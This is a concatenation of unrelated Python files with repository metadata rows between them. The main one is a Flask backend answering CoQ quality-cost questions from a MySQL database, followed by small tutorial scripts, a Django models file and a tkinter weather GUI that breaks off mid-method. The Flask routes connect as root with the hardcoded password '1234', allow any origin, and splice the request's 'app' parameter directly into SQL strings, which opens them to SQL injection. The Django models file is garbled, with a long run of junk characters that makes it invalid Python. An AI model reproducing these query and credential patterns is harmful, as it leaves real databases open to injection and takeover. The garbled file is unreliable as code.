cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('NB','Monitor','IAVM')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+"'"+r[0]+"',"
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'AA BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('AA-BD4','AUTO-BD5')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+"'"+r[0]+"',"
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'TV BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('TV','SET_TV')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+"'"+r[0]+"',"
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
else :
belowStandardApp = "'"+app+"'"
# get top 3 model
if (app == 'ITI BU' or app == 'AA BU' or app == 'MD BU' or app == 'TV BU') and belowStandardApp != '' :
cur.execute("select bu,model,ROUND(COST/1000000,2) cost,ROUND(rate,1) rate,customer,cost_category,ROUND(BYMODELCUSTOMERCATE_COST/1000000,2) bymodelcustomercate_cost from coq.mc where yearmonth=%s and bu in ("+belowStandardApp+") and length(board_title)=26 and rank = 1 order by rank,cost limit 5",(yearmonth))
elif app in appList and belowStandardApp != '' :
cur.execute("select bu,model,ROUND(COST/1000000,2) cost,ROUND(rate,1) rate,customer,cost_category,ROUND(BYMODELCUSTOMERCATE_COST/1000000,2) bymodelcustomercate_cost from coq.mc where yearmonth=%s and bu in ("+belowStandardApp+") and length(board_title)=26 order by rank,cost limit 5",(yearmonth))
elif belowStandardApp != '':
cur.execute("select distinct bu,model,ROUND(COST/1000000,2) cost,ROUND(rate,1) rate,customer,cost_category,ROUND(BYMODELCUSTOMERCATE_COST/1000000,2) bymodelcustomercate_cost,rank from coq.mc where yearmonth=%s and length(board_title)=26 and bu in ("+belowStandardApp+") order by rank,cost limit 5",(yearmonth))
i = 1
if cur.rowcount > 0 :
for r in cur :
returnData['('+str(i)+')'] = r[1]+'外失成本'+str(r[2])+'(M NTD) 佔'+r[0]+'總外失比為'+str(r[3])+'%。該機種以客戶'+str(r[4])+'發生'+str(r[5])+'所佔最高,為'+str(r[6])+'(M NTD)';
i = i + 1
returnData[' '+str(yearmonth)+' '+app+' Top3 Model'] = ''
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q013',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# 14. Q014 Top3 Customer
@app.route("/Q014", methods=['GET'])
def Q014():
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
buList = ['ITI BU','AA BU','MD BU','TV BU']
appList = ['TV','SET_TV','AA-BD4','NB','MONITOR','IAVM','MP','CE','TABLET','AUTO-BD5']
# get Below standard
belowStandardApp = ''
if app == '所有應用' :
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target' and app <> %s and app not in ('AII BU','MD BU')) b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000",(yearmonth,app,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+"'"+r[0]+"',"
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'MD BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('MP','CE','Tablet')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+"'"+r[0]+"',"
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'ITI BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('NB','Monitor','IAVM')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+"'"+r[0]+"',"
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'AA BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('AA-BD4','AUTO-BD5')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+"'"+r[0]+"',"
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'TV BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('TV','SET_TV')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+"'"+r[0]+"',"
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
else :
belowStandardApp = "'"+app+"'"
# get top 3 customer
if (app == 'ITI BU' or app == 'AA BU' or app == 'MD BU' or app == 'TV BU') and belowStandardApp != '' :
cur.execute("select bu,customer,ROUND(COST/1000000,2) cost,ROUND(rate,1) rate from coq.mc where yearmonth=%s and bu in ("+belowStandardApp+") and length(board_title)=30 and rank = 1 order by rank,cost limit 5",(yearmonth ))
elif app in appList and belowStandardApp != '' :
cur.execute("select bu,customer,ROUND(COST/1000000,2) cost,ROUND(rate,1) rate from coq.mc where yearmonth=%s and bu in ("+belowStandardApp+") and length(board_title)=30 order by rank,cost limit 5",(yearmonth ))
elif belowStandardApp != '':
cur.execute("select distinct bu,customer,ROUND(COST/1000000,2) cost,ROUND(rate,1) rate,`rank` from coq.mc where yearmonth=%s and length(board_title)=30 and bu in ("+belowStandardApp+") order by rank,cost limit 5",(yearmonth))
i = 1
if cur.rowcount > 0 :
for r in cur :
returnData['('+str(i)+')'] = r[1]+'外失成本'+str(r[2])+' (M NTD) 佔'+r[0]+'總外失比為'+str(r[3])+'%。'
i = i + 1
returnData[' '+str(yearmonth)+' '+app+' Top3 Customer'] = ''
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q014',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# 15. Q015 預計損失圖
@app.route("/Q015", methods=['GET'])
def Q015():
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
cur.execute("SELECT round(sum(total)/1000000,2) FROM aerb where yearmonth=%s",(yearmonth))
AERB = cur.fetchone()[0];
returnData = OrderedDict();
returnData[str(yearmonth)+' '+app+' AERB預期未來損失'] = str(AERB)+'M (NTD)'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q015',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# 16. Q016 2018年度CoQ狀況
@app.route("/Q016", methods=['GET'])
def Q016():
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
Chat_ID = request.args.get('Chat_ID')
returnData = OrderedDict();
cur.execute("SELECT round(GROUP_CONCAT(if(sorting = '', cost, NULL))*100,2),round(GROUP_CONCAT(if(sorting = '10', cost, NULL))*12/1000000,2),round(GROUP_CONCAT(if(sorting = '13', cost, NULL))/10000,2) FROM forboard where app=%s and yearmonth=201800 and sorting in ('','10','13')",(app))
for r in cur :
returnData['2018 '+app+'年度CoQ狀況']=''
returnData['Target']=str(r[0])+'%'
returnData['CoQ']=str(r[1])+'M (NTD)'
returnData['CoQ Rate']=str(r[2])+'%'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,None,'Q016',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# 17. Q017 BU月圖
@app.route("/Q017", methods=['GET'])
def Q017():
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
yearmonth = cur.fetchone()[0];
returnData = OrderedDict();
returnData[' '+str(yearmonth)+' '+app+'BU月圖']=''
if app == '所有應用':
cur.execute("SELECT IFNULL(a5,0)+IFNULL(a6,0)+IFNULL(a7,0)+IFNULL(a8,0) FROM accumulation where app='所有應用' and yearmonth=%s",(yearmonth))
elif app == 'MD BU':
cur.execute("SELECT IFNULL(a4,0)+IFNULL(a5,0)+IFNULL(a6,0) FROM accumulation where app='MD BU' and yearmonth=%s",(yearmonth))
elif app == 'TV BU':
cur.execute("SELECT IFNULL(a3,0)+IFNULL(a4,0) FROM accumulation where app='TV BU' and yearmonth=%s",(yearmonth))
elif app == 'ITI BU':
cur.execute("SELECT IFNULL(a4,0)+IFNULL(a5,0)+IFNULL(a6,0) FROM accumulation where app='ITI BU' and yearmonth=%s",(yearmonth))
elif app == 'AA BU':
cur.execute("SELECT IFNULL(a3,0)+IFNULL(a4,0) FROM accumulation where app='AA BU' and yearmonth=%s",(yearmonth))
else :
cur.execute("SELECT IFNULL(a8,0)+IFNULL(a9,0)+IFNULL(a10,0)+IFNULL(a11,0) FROM accumulation where app=%s and yearmonth=%s",(app,yearmonth))
accumulationValue = cur.fetchone()[0];
returnData['1. 截至'+str(yearmonth)+'累計CoQ目標'] = str(round(accumulationValue/1000000,1))+'M (NTD)'
cur.execute('SELECT output1,output2,output3,output4,output5,output6 FROM remainCoQ where yearmonth = %s and application = %s',(yearmonth,app))
for r in cur :
returnData['2. 截至'+str(yearmonth)+'累計已支出CoQ'] = str(round(r[1]/1000000,1))+'M (NTD)'
returnData['3. 年底達標預計可支出總CoQ'] = str(round(r[0]/1000000,1))+'M (NTD)'
returnData['4. 年剩餘額度'] = str(round(r[2]/1000000,1))+'M (NTD)'
returnData['5. 年剩餘可控額度'] = str(round(r[4]/1000000,1))+'M (NTD)'
returnData['6. 年平均CoQ Rate'] = str(round(r[3]*100,2))+'%'
returnData['7. 年供應商賠償總額'] = str(round(r[5]/1000000,1))+'M (NTD)'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q017',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# 35. CoQ是什麼
@app.route("/Q035", methods=['GET'])
def Q035():
Chat_ID = request.args.get('Chat_ID')
returnData = OrderedDict();
returnData['CoQ(Cost of Quality)']='指為了提高和保證產品品質而支出的一切費用,以及因產品品質未達到規定的要求而造成的一切損失的總和。'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat('',None,'Q035',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# 36. CoQ rate怎麼算
@app.route("/Q036", methods=['GET'])
def Q036():
Chat_ID = request.args.get('Chat_ID')
returnData = OrderedDict();
returnData['CoQ Rate']='Σ(預防+鑑定+內失+外失)成本 / 營收'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat('',None,'Q036',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# 37. 預防成本是什麼
@app.route("/Q037", methods=['GET'])
def Q037():
Chat_ID = request.args.get('Chat_ID')
returnData = OrderedDict();
returnData['學術定義']='用於避免生產出不良品而投入的成本。'
returnData['資料定義']='DQ/SQ/MQ/QS的十大費用(排除直接人事費用)。'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat('',None,'Q037',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# 38. 鑑定成本是什麼
@app.route("/Q038", methods=['GET'])
def Q038():
Chat_ID = request.args.get('Chat_ID')
returnData = OrderedDict();
returnData['學術定義']='檢驗產品是否符合標準的成本。'
returnData['資料定義']='DQ/SQ/MQ/QS的十大費用(排除直接人事費用)。'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat('',None,'Q038',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# 39. 外失成本是什麼
@app.route("/Q039", methods=['GET'])
def Q039():
Chat_ID = request.args.get('Chat_ID')
returnData = OrderedDict();
returnData['學術定義']='產品運交至顧客後,因未能達到品質要求而造成的損失。'
returnData['資料定義']='MQ/SQ的部份間接人事費用<br>產品於廠內執行報廢/重工/降等所產生的費用。'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat('',None,'Q039',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# 40. 內失成本是什麼
@app.route("/Q040", methods=['GET'])
def Q040():
Chat_ID = request.args.get('Chat_ID')
returnData = OrderedDict();
returnData['學術定義']='產品運交至顧客前,因未能達到品質要求而造成的損失。'
returnData['資料定義']='1.RMA返品的維修、報廢、OBA/SORTING、賠償...等相關費用。<br>2.因品質問題導致營收減少的費用。<br>3.外失-其它:CQ/RMA的十大費用(排除營運費用)。'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat('',None,'Q040',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# 41. 外失售保是什麼
@app.route("/Q041", methods=['GET'])
def Q041():
Chat_ID = request.args.get('Chat_ID')
returnData = OrderedDict();
returnData['資料定義']='RMA管理帳的費用。'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat('',None,'Q041',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# 42. 內失AERB是什麼
@app.route("/Q042", methods=['GET'])
def Q042():
Chat_ID = request.args.get('Chat_ID')
returnData = OrderedDict();
returnData['資料定義']='廠內有標誌AERB,至降等或報廢的PANEL。'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat('',None,'Q042',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# 43. 外失Rebate是什麼
@app.route("/Q043", methods=['GET'])
def Q043():
Chat_ID = request.args.get('Chat_ID')
returnData = OrderedDict();
returnData['資料定義']='CQE 客戶要求rebate的費用。'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat('',None,'Q043',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# 48. Q048 EXP 20200131
@app.route("/Q048", methods=['GET'])
def Q048():
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
cur.execute('SELECT round(100*(IFNULL(GROUP_CONCAT(if(sorting = "01", cost, NULL)),0)+IFNULL(GROUP_CONCAT(if(sorting = "02", cost, NULL)),0)+IFNULL(GROUP_CONCAT(if(sorting = "03", cost, NULL)),0)+IFNULL(GROUP_CONCAT(if(sorting = "04", cost, NULL)),0))/sum(cost),2) FROM forboard WHERE yearmonth = %s and app=%s and sorting in ("01","02","03","04","05","06","07") group by yearmonth',(yearmonth,app))
EXPRate = cur.fetchone()[0];
returnData = OrderedDict();
if yearmonth % 100 == 0 :
yearmonthTmp = str(yearmonth//100)+'全年'
else :
yearmonthTmp = str(yearmonth)
returnData[yearmonthTmp+' '+app+' EXP佔比'] = str(EXPRate)+'%'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q048',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# 49. Q049 CoPQ 20200131
@app.route("/Q049", methods=['GET'])
def Q049():
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
cur.execute('SELECT round(100*(IFNULL(GROUP_CONCAT(if(sorting = "05", cost, NULL)),0)+IFNULL(GROUP_CONCAT(if(sorting = "06", cost, NULL)),0)+IFNULL(GROUP_CONCAT(if(sorting = "07", cost, NULL)),0))/sum(cost),2) FROM forboard WHERE yearmonth = %s and app=%s and sorting in ("01","02","03","04","05","06","07") group by yearmonth',(yearmonth,app))
CoPQRate = cur.fetchone()[0];
returnData = OrderedDict();
if yearmonth % 100 == 0 :
yearmonthTmp = str(yearmonth//100)+'全年'
else :
yearmonthTmp = str(yearmonth)
returnData[yearmonthTmp+' '+app+' CoPQ佔比'] = str(CoPQRate)+'%'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q049',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
if __name__ == '__main__':
localDB = False #False #True
if localDB == True :
host = '127.0.0.1'
port=3306
else :
#conn = pymysql.connect( host = '10.55.52.98' ,port=33060 , user = 'root' , passwd = "1234" , db = 'coq' )
#host = '10.56.211.124'
host = '10.55.52.98'
port=33060
#run_simple('10.55.8.201', 84, app)
app.run(host='0.0.0.0', port=83)
#run_simple('10.56.244.8', 84, app)
| [
"ukljm.2005@gmail.com"
] | ukljm.2005@gmail.com |
e25ee8942b20a0704262265705ad3ad2b5b7b407 | f99f30752e9bb9e023b37c731f64fb2155ac3daf | /03/zip.py | 69160f8e55ebbe1da4acd417e0cd571fe8488b3e | [] | no_license | chu83/python-basics | 148ff6977f5ca04775951d90ed1f5f763c51a9ff | 19fe0937842c668f604876be0aeb0962a2630dd2 | refs/heads/master | 2023-01-19T01:29:25.203738 | 2020-11-29T18:34:33 | 2020-11-29T18:34:33 | 311,258,549 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 335 | py | print('========== zip() 함수 사용 예 ===========')
s1 = ['foo', 'bar', 'baz']
s2 = ['one', 'two', 'three', 'four']
z = zip(s1, s2)
print(z, type(z))
print('========== 순회1 ===========')
for t in z:
print(t, type(t))
z = zip(s1, s2)
for a, b in z:
print(a, b)
print('========== 순회2 ===========')
z = zip(s1, s2) | [
"59534807+chu83@users.noreply.github.com"
] | 59534807+chu83@users.noreply.github.com |
9aa6bf4b4b666c0fdab75fe77819b9f91a25419b | 3756d737b51b9d1518f689435f3414afec064f5d | /GUI/Spin Box Widget/Spin_box_widget_number.py | 57b3f7a8853b7e9f7f5d4d38582cc58541ed0745 | [] | no_license | SHUBHAM-BHATTACHARYA/Python-Program | 49e6e6b6e83b1313965c40d194df69b8ab580568 | 79fdba2904d01eb6ff1c161557673c7f14b9c225 | refs/heads/master | 2022-11-12T18:06:06.909797 | 2020-07-09T03:35:27 | 2020-07-09T03:35:27 | 278,025,327 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 192 | py | from tkinter import *
window = Tk()
window.title("Welcome ")
window.geometry('350x200')
spin = Spinbox(window, values=(3, 8, 11), width=5)
spin.grid(column=0,row=0)
window.mainloop()
| [
"noreply@github.com"
] | noreply@github.com |
46dadcb89023a1f732e536ca17264b8cf5a87555 | f65e1d0f746d1c36392fe791b0277f6d3887cd95 | /print.py | dc9f4ab391cf9cd0e4eb58223a4e0bce82683056 | [] | no_license | trinitruong/learn-python | bb84189766ddcdd049da471374a3364aeba0c0a0 | 0148880e4cab028012b0c3505994a8bc92cf4c7b | refs/heads/master | 2021-02-08T02:54:48.425636 | 2020-03-15T05:44:23 | 2020-03-15T05:44:23 | 244,101,302 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 852 | py | #to print verbatim use print() function
def main():
# print a string to the console/terminal
#use single or double quotes inside parenthesis to create string
print("something")
# print a variable
#a is the variable, 321321 is value assigned to variable
a = 321321
print(a)
b = "afhgdsgds"
print(b)
c = 7.62863
print(c)
if __name__ == "__main__":
main()
# string are defined with a single or double quote
# when string is printed, it will print verbatim
print("keep going")
# strings can also be assigned to a variable
k = "Don't stop"
print(k)
# multiple variables can be assigned on one line:
x, y, z = 'one', 'two', 'three'
print(x,y,z)
h, j, t = 2, 3, 4
print(h,j,t)
# can print any combination of variables because they are all numbers
# can not print mix of numbers & strings
print(z,j,x)
| [
"trinitruong001@gmail.com"
] | trinitruong001@gmail.com |
9dad79201f18f38def9a65250a4156fddfac10ec | 0a01b20dade2c968ebb0b4f4f8425c22b1c9b8c4 | /WebApp/models.py | 55b15b803a321a5580dbb1a33fdd896e1a8ba27a | [] | no_license | avitko001c/django_project | 216ca1b2953c6c92a2db63961a8567dfd6d6294f | 1bca2809b30ef7523d628f38e4d219f0f79bf6cb | refs/heads/master | 2022-12-13T22:58:36.222258 | 2020-09-13T23:40:45 | 2020-09-13T23:40:45 | 295,257,412 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 798 | py | from django.db import models
from django.db.models.fields.json import JSONField
from django_mysql.models import ListCharField
from django.db.models.fields import *
from django.utils.importlib import import_module
# Create your models here.
class Email(models.Model):
headers = JSONField()
email_to = ListCharField(base_field=EmailField())
email_from = EmailField()
bcc = ListCharField(base_field=EmailField())
cc = ListCharField(base_field=EmailField())
subject = CharField()
raw_email = JSONField()wajyhggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg | [
"andrewvitko@gmail.com"
] | andrewvitko@gmail.com |
0d543afecf4a0144548d3602be45f8e851f1657b | a61dae5e34605f708cec4ba661a3e6d2ed78ab73 | /Weather/GUI.py | 595c6a018becfbd6c4cf78563b0fa83b0d9947dd | [] | no_license | ChyiYaqing/PythonPrj | a475c2f83db2a607377d24a78a8c0aa1220229e3 | a7f8e9c0263b4f0f3827c5488ab4fed002962a1b | refs/heads/master | 2020-06-02T01:27:05.095901 | 2017-06-25T12:48:30 | 2017-06-25T12:48:30 | 94,090,551 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,424 | py | #!/usr/bin/env python3
#-*- coding: utf-8 -*-
try:
# for Python2
from Tkinter import * ## notice capitalized T in Tkinter
except ImportError:
# for Python3
from tkinter import * ## notice lowercase 't' in tkinter here
from Weathers import *
import urllib2
from threading import Thread
import tkMessageBox
from sys import exit
class MyThread(Thread):
def run(self):
tkMessageBox.showinfo("Error", "The City Is Not Exist!")
class Top(Frame):
def __init__(self, master=None, content=None, chart=None, today=None):
Frame.__init__(self, master)
self.content = content
self.master = master
self.chart = chart
self.today = today
self.createWidget()
def createWidget(self):
self.e = StringVar()
self.top = LabelFrame(self, text = 'City Name', padx = 5, pady = 5)
#create the LabelFrame widget with string 'City Name'
self.e.set(self.content.weathers.city)
#set the varible of type of StringVar as self.cityname
self.entry = Entry(self.top, width=29, textvariable=self.e)
#create the Entry widget
self.submitbutton = Button(self.top, text = "submit", command=self.submitcity)
#create the Button widget
self.submitbutton.bind("<Return>", self.submitcity)
#bind the Button namely submit with Enter Key in keyboard
self.entry.pack(side='left')
self.submitbutton.pack(side="right")
self.top.pack(fill=X)
#place the widgets on frame namely Top
#define the function namely submit and it is the activity of button namely submit
def submitcity(self):
lastcityname = self.content.weathers.city
#backup the cityname as lastcityname
cityname = self.entry.get().capitalize()
#make cityname as a same formate
if self.content.updateWeathers(cityname) == 1:
MyThread().start()
cityname = lastcityname
self.e.set(lastcityname)
else:
self.chart.updateLineChart()
self.today.updateToday()
class Today(Frame):
def __init__(self, master=None, content=None):
Frame.__init__(self, master)
self.content = content
self.createWidget()
def createWidget(self):
self.today = LabelFrame(self, text='today')
self.img = PhotoImage(file='Today.gif')
self.canvas = Canvas(self.today, height=90)
self.item1 = self.canvas.create_image(150, 50, image=self.img)
self.item2 = self.canvas.create_text(20, 10, text=self.content.weathers.day[0])
self.item3 = self.canvas.create_text(80, 10, text=self.content.weathers.date[0])
self.item4 = self.canvas.create_text(150, 80, text=self.content.weathers[0].mindegree + 'C ~ ' + self.content.weathers[0].maxdegree + 'C')
self.canvas.pack(fill=X)
self.today.pack(fill=X)
def updateToday(self):
self.img = PhotoImage(file='Today.gif')
self.canvas.itemconfigure(self.item1, image=self.img)
self.canvas.itemconfigure(self.item2, text=self.content.weathers.day[0])
self.canvas.itemconfigure(self.item3, text=self.content.weathers.date[0])
self.canvas.itemconfigure(self.item4, text=self.content.weathers[0].mindegree + 'C ~ ' + self.content.weathers[0].maxdegree + 'C')
class Content(Frame):
def __init__(self, master=None):
Frame.__init__(self, master)
self.master = master
self.weathers = Weathers()
self.weathers.setDefaultCity()
self.createWidget()
self.initWeathers()
def createWidget(self):
self.labels = [];
#self.today = LabelFrame(self, text = 'Today Weather', padx = 5, pady = 5)
self.feture = LabelFrame(self, text = 'Feture Weather', padx = 5, pady = 5)
#self.label.pack()
self.labels.append(Label(self, justify = 'left', anchor = 'w', fg = 'red'))
#self.labels[0].pack(fill=X)
for i in range(1, 5):
self.labels.append(Label(self.feture, justify = 'left', anchor = 'w'))
self.labels[i].pack(fill=X)
#self.today.pack(fill=X)
self.feture.pack(fill=X)
def initWeathers(self):
try:
self.weathers.setURL()
self.weathers.setWeathersFromInternet()
except urllib2.URLError:
tkMessageBox.showinfo("Error", "Please check connect!")
exit(0)
for i, wea in enumerate(self.weathers, start=0):
self.labels[i]['text'] = wea.message
#fill in message in the text of labels
def updateWeathers(self, cityname):
self.weathers.setCity(cityname)
self.weathers.setURL()
try:
if self.weathers.setWeathersFromInternet() == 1:
return 1
except urllib2.URLError:
tkMessageBox.showinfo("Error", "Please check connect!")
exit(0)
for i, wea in enumerate(self.weathers, start=0):
self.labels[i]['text'] = wea.message
self.weathers.saveWeathers()
return 0
class LineChart(Frame):
def __init__(self, master=None, content=None):
Frame.__init__(self, master)
self.content = content
self.createWidget()
self.initChart()
self.drawLineChart()
def createWidget(self):
self.chartframe = LabelFrame(self, text = 'LineChart', padx = 5, pady = 5);
self.chart = Canvas(self.chartframe, height=200)
self.chartframe.pack(fill=X)
self.chart.pack()
img = PhotoImage(file='./icon/purple_retina.gif')
self.label = Label(self)
self.label.configure(image=img)
self.label.image = img
self.label.pack(side='right')
def initChart(self):
self.chart.create_line(20, 20, 20, 180, fill='black')
#y
self.chart.create_line(10, 170, 270, 170, fill='black')
#x
self.chart.create_line(15, 25, 20, 20, fill='black');
self.chart.create_line(25, 25, 20, 20, fill='black');
#y
self.chart.create_line(265, 165, 270, 170, fill='black');
self.chart.create_line(265, 175, 270, 170, fill='black');
for i in range(0, 5):
self.chart.create_line(40 * i + 60, 170, 40 * i + 60, 165, fill='black')
def drawLineChart(self):
self.pointmax = []
self.pointmin = []
self.minmin = sorted(self.content.weathers.mindegree)[0]
self.maxmax = sorted(self.content.weathers.maxdegree)[len(self.content.weathers.maxdegree) - 1]
self.gap = 150 / (self.maxmax - self.minmin) - 1
for i, d in enumerate(self.content.weathers.maxdegree[0:6]):
self.pointmax.append((170 - ((d - self.minmin) * self.gap) - 10, 60 + i * 40))
for i, d in enumerate(self.content.weathers.mindegree[0:6]):
self.pointmin.append((170 - ((d - self.minmin) * self.gap) - 10, 60 + i * 40))
for i, wea in enumerate(self.content.weathers, start=0):
self.chart.create_text(40 * i + 60, 175, text=wea.date.split()[0])
for i in range(1, len(self.pointmax)):
self.chart.create_line(20, self.pointmax[i - 1][0], 25, self.pointmax[i - 1][0], fill='red')
self.chart.create_text(30, self.pointmax[i - 1][0], text=self.content.weathers[i - 1].maxdegree, fill='red')
self.chart.create_line(self.pointmax[i - 1][1], self.pointmax[i - 1][0], self.pointmax[i][1], self.pointmax[i][0], fill='red')
self.chart.create_line(20, self.pointmax[len(self.pointmax) - 1][0], 25, self.pointmax[len(self.pointmax) - 1][0], fill='red')
